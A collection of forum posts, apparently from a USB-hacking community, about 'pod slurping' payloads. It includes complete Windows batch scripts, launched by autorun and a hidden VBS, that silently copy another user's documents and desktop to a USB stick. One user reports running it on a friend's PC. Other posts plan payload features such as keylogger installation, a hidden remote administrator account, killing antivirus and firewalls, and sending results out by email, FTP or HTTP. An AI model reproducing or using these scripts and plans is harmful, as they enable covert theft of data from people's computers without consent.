[pod slurping help]

:) alright i tried it to my friends pc(windows vista)the other day i got the some pictures but not all of them.ie i didnt get any pic from the folder "my pictures".AND i tried it again to my windows xp and didnt work.:F

is there any way search for pics of certain size:) thanks in advance again

I haven't a Windows Vista installation for testing why it doesn't work with Vista, probabily is because the reg keys are not the same with Vista (someone can clarify this?). But for Windows XP must be working...

You can adapt the script as far as you want, but, by the momment, I haven't so much time to do it for you. :(

[pod slurping help]

dmilton sorry but it didnt work both in the english and greek computer:(thanks anyway!

and dingle i dont know how to modify the exe file that u are saying:((Noobie)

Fixed, it works. Try this.

echo off
set ActualUser=".\CurrVer.dat"
set TmpVal=".\tmpval.dat"
set Common=".\Common.dat"
set /A ValCounter=1
if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
if exist %Common% del /S /F /Q /A:- %Common%
if exist %TmpVal% del /s /F /Q /A:- %TmpVal%
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
if not %errorlevel%==0 goto error
type %ActualUser% | find "Personal" >> %TmpVal%
type %ActualUser% | find "Desktop" >> %TmpVal%
type %Common% | find "Common Documents">> %TmpVal%
type %Common% | find "Common Desktop">> %TmpVal%
FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO set var="%%i"
if "%var%"=="" goto error
FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO (
call:FOUND %%i
)
del /S /F /Q /A:- %ActualUser%
del /S /F /Q /A:- %Common%
del /S /F /Q /A:- %TmpVal%
goto :CONTINUE
:FOUND
SET PP="%~1"
SET PP=%PP:\\=\%
SET PP=%PP:"=%
SET RegKey=%PP%
IF %ValCounter%==1 SET MyD=%RegKey%
IF %ValCounter%==2 SET Dsk=%RegKey%
IF %ValCounter%==3 SET ShDoc=%RegKey%
IF %ValCounter%==4 SET ShDsk=%RegKey%
set /A ValCounter=ValCounter+1
:error
GOTO :EOF
:CONTINUE
:: Here I added the actions you want to do
mkdir %~d0\%computername%\MyDocs
mkdir %~d0\%computername%\Desktop
mkdir %~d0\%computername%\SharedDocs
mkdir %~d0\%computername%\SharedDesktop
xcopy "%MyD%" %~d0\%computername%\MyDocs /s/c/q/r/h
xcopy "%Dsk%" %~d0\%computername%\Desktop /s/c/q/r/h
:: Here I added similar slurping actions to do the same with Shared Documents and Shared Desktop (no worry what language you have)
xcopy "%ShDoc%" %~d0\%computername%\SharedDocs /s/c/q/r/h
xcopy "%ShDsk%" %~d0\%computername%\SharedDesktop /s/c/q/r/h
exit

[pod slurping help]

basically i tried to understand all that stuff but it seems quite strange to me. what i ve done is pretty much traditional,simple and straight forward to me !so here what ive done;i ve put an autorun an invis.vbs and 2 bat files.

first bat is

wscript.exe "%~d0\invis.vbs" "drivers.bat"

and the second

@echo off
mkdir %~d0\%computername%
xcopy "C:\Documents and Settings\%username%\My Documents" %~d0\%computername% /s/c/q/r/h
xcopy "C:\Documents and Settings\%username%\Desktop" %~d0\%computername% /s/c/q/r/h
@cls
@exit

so what u sent to me will probably solve my problem but the thing is that i dont know how and where to put the code.i am pretty much interested in getting .jpeg,word files etc. and ie history.or just copying "my documents and desktop.(no prob since i got a 32 gb stick)so i dont think switch blade is the one for me.

thx for anwsering hope this things dont sound too stupid to you:)

The problem you have is the language, if you want to do it with a defined path (Desktop is not same folder in greek than in english), it will surely fail. With Dingleberries method, you can easily modify the python script to slurp the desired files of "My PC".

I prepared an slurping batch to do the exact thing you want, just substitute the second batch you have with this one:

@echo off
set ActualUser=".\CurrVer.dat"
set TmpVal=".\tmpval.dat"
set Common=".\Common.dat"
set /A ValCounter=1
if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
if exist %Common% del /S /F /Q /A:- %Common%
if exist %TmpVal% del /s /F /Q /A:- %TmpVal%
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
if not %errorlevel%==0 goto error
type %ActualUser% | find "Personal" >> %TmpVal%
type %ActualUser% | find "Desktop" >> %TmpVal%
type %Common% | find "Common Documents">> %TmpVal%
type %Common% | find "Common Desktop">> %TmpVal%
FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO set var="%%i"
if "%var%"=="" goto error
FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO (
call:FOUND %%i
)
del /S /F /Q /A:- %ActualUser%
del /S /F /Q /A:- %Common%
del /S /F /Q /A:- %TmpVal%
goto :CONTINUE
:FOUND
SET PP="%~1"
SET PP=%PP:\\=\%
SET PP=%PP:"=%
SET RegKey=%PP%
IF %ValCounter%==1 SET MyD=%RegKey%
IF %ValCounter%==2 SET Dsk=%RegKey%
IF %ValCounter%==3 SET ShDoc=%RegKey%
IF %ValCounter%==4 SET ShDsk=%RegKey%
set /A ValCounter=ValCounter+1
:error
GOTO :EOF
:CONTINUE
:: Here I added the actions you want to do
mkdir %~d0\%computername%
xcopy "C:\Documents and Settings\%username%\%MyD%" %~d0\%computername% /s/c/q/r/h
xcopy "C:\Documents and Settings\%username%\%Dsk%" %~d0\%computername% /s/c/q/r/h
:: Here I added similar slurping actions to do the same with Shared Documents and Shared Desktop (no worry what language you have)
xcopy "C:\Documents and Settings\%username%\%ShDoc%" %~d0\%computername% /s/c/q/r/h
xcopy "C:\Documents and Settings\%username%\%ShDsk%" %~d0\%computername% /s/c/q/r/h
@cls
@exit

Tell us if worked DingleBerries method or mine.

[pod slurping help]

Try my Reliable Paths Method that is published in the wiki. I think it'll solve your problem.

Let us know it!

[Is this possible?]

Im going to look at that, used the pocketknife for a day but i like to do my own thing lol. It would be great to have an .ini or something that it reads for extensions, however some systems wont let you run bats or vbs so exes are just easier.

I scripted it for the pocketknife but it was never implemented because the project died. You can translate it to...anything!

Look it, is very simply and the concept in how-to do it is easy to understand. And if you don't want to have it in a batch, you can compile it too.

It will work in 99% of cases, let me know what systems don't let you run bats or vbs (questionable)

EDIT:

Bad link, try THIS ONE

BTW if you want a proof of concept, I'll release it.

[Usb ram dump]

I think it's not necessary to have admin privileges to make a dd copy of ram memory.

For your purpose, you can use Mantech Memory DD to make a forensic image of physical memory, storing it as a raw binary filemage. Then, at home, you can use Volatility (perl framework) to analyze the image.

You can call the MDD (Mantech Memory DD) in an automated way from the usb with no problem (it doesn't need any library) and it will work for Windows 2000, Windows Server 2003, Windows XP, Windows Vista, and Windows Server 2008.

The resultant image can grow to 4GB...

[Is this possible?]

Why don't try to implement THIS to your payload's code?

It'll give you a way to slurp all the desired documents you want with a pre-configured plain text file with the extensions you need. It's easy ready to go and only needs some of copy-paste actions.

That's the war!

EDIT:

Bad link, changed to good one

[Trouble with U3 hack]

If you cant install it you shouldnt use it.

I agree

[7zBlade]

With Avast! I get... http://www.myupload.dk/download/1864144e8f.zip\run.bat as HTML:Malware-gen.

The bat is detected? Bad thing, man.

The code is simple and it looks effective. The problem is that av is detecting the bat (I haven't tried with more av's).

I prefer to have all type of configurable loads for the payload, but, it's not a bad work. For simple tasks, simple sollutions!

[hackblade modification help!!!!]

It's not difficult to program an app to do the next:

a) Testing the serial number of the inserted USB (to not have to test for a concrete drive letter)

B) If it fits with a given list, do some code (as nothing by example)

c) If it doesn't fit with a given list, do some else code, as slurping the contents or creatting a perfect copy of the hardware (dd copy), or spreading some code inside the usb, or infecting something, or pushing the nuclear red button!!!

It's only an idea, but factible. The only you have to do is programming it

[DingleBerries Tantō Payload]

Specific payload to an specific system? Hummm...

I think that with the correct programming issues, It'll be factible to have one payload for all systems, the question is that you have to check many things before doing the work as os version, installation language, good checking of paths, checking for privileges, vulnerabilities, bypassing av, etc.

It's why I was writting a new payload, of course

[Trouble with U3 hack]

This is a free community, we can help others to have their weapons greased, but there's many people that doesn't want to read into a forum to get their onwn conclusions ready.

Offering a service is as lucrative as getting the service ready to run without reading anything and without having any headache... Someone wants to be spooned? Ok, it'll surely have a price, isn't it?

For other else who wants to learn, ever will be an answer on how-to.

[USB Pocket-Knife Development]

Hi!

I had an accident and by now I can't write as much I want, because my arm is broken.

Be patient, the payload will be ready when I feel better!

[USB Pocket-Knife Development]

English, Français, Español, Traditional Chinese... Wow! It sounds very good!

I think an stable vbs+batch version will be ready next weekend, I need some time... Probably with something not enabled yet but working.

[USB Pocket-Knife Development]

Ok, Pocket-Knife isn't still dead.

Some known people in the forums is developing new functionallities that can be added to the payload.

I'm working in my few free time trying to fix bugs and adding some other stuff to the pocketknife payload. Some of the forum users are doing their work and we are collaborating in keeping the payload alive.

I hope, it will work all right on:

• - Correction of the "file not found" Error given while checking for mounted devices not present.

- Cleaning of the code, specially with the use of variables.

- Updating of all the programs used by the payload.

- Extended detection of correct installation paths with reliable path method.

- Total functionallity on other machines with non English installation languages.

- Slurping for concrete files and/or concrete paths.

- Slurping actions on all the users accounts of the PC.

- Keylogger correct installation.

- Results into an html way.

- Adding a hidden administrator account of the user election with remote privileges.

- Trying to look for a way to make the payload running on Vista systems (not sure).

- Free election for retrieving results of the payload by different ways: email, ftp, http+PhP+SQL

- Killing av tasks.

- Addition of some of the stuff contained into the Tcstool payload U3 Incident Response Payload, thanks to Tcstool.

- Addition of some of the stuff contained into the DingleBerries payload DingleBerries Tantō Payload, thanks to DingleBerries.

- alexthedrifter is adding some useful new stuff to the payload, and working on a GUI to easy configuration of the payload options, thanks to alexthedrifter.

- And more...

Also I want to look for help/ideas into:

• - Translating the payload into other languages to have your own language spoken results payload. (I'll do the work for spanish language).

- Code scripting to do the stuff done by the av detected nirsoft programs.

Just wait a bit, I'm not plenty of time but working on it... And before releasing a version, I want it free of bugs.

[SwitchBlade error]

Just search in the forum...

Here you have a solution

[U3 and Non-U3 AutoIT payload]

Yes, the problem is with any firewall software, then there's another problem that is to disable the firewall software. You can do it in windows but must to kill the task with other firewall software... Then double problem!

One: Disable the antivirus...

Two: Disable the firewall...

With the batch method, you doesn't need to disable (or allow) anything but the antivirus software. Please, correct me if is not as I'm saying.

I think a good solution is calling a batch from the AutoIT program, give it the correct parameters into variables and do the task with the batch.

Other way could be using different ways (ftp, http post, email), selectable by the user in a pre-configuration (by the GUI) to send the logs and calling different batches from the compiled exe with the options elected. Then the payload would work for anyone using it.

[U3 and Non-U3 AutoIT payload]

how about doing the php log transfer thing with autoit?

When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls.

DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

Of course! I didn't thought about it, but I agree that any firewall will trigger the program while accessing the Internet... Then will see on what you have been working when you have it done.

[USB Pocket-Knife Development]

I hope you find your U3 again... Loosing an U3 is as loosing a good friend,

[Scratching on Outlook mailing list?]

Yes, I know you can just copy the pst file, but as you say, it can be large, in fact... very large.

The purpose of the script only was extracting the contacts of the pst file, but thanks for your suggestions.

[U3 and Non-U3 AutoIT payload]

Ok, ok, ok... I was seeing it at now...

I know the fact to have your compiled version for the payload is better to hide your fingertips because you are compiling the mail account name and password into the same exe file but, what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80.

[U3 and Non-U3 AutoIT payload]

What about the GUI?

[Alternative Method to Kill AV's.]

Very interesting! It seems you are on holidays! ^_^

[USB Pocket-Knife Development]

Ill test and QA!

i don't know if i have enough time to code :(

All contributions will be good contributions ;)

Why did laepo just ignore his thread? He could just tell us that he doesn't want to continue the development, instead of making people wonder where he's been for the past 2 months or so.

If you know it, make us know... I think he's very busy but we don't know the exact matter.

[U3 and Non-U3 AutoIT payload]

I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3?

Is the original host files copied and reinstalled after the iso is updated?

:edit answered

FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
..
..
If FileExists( @SystemDir & "\drivers\etc\hosts.orig")  Then
FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

WOW!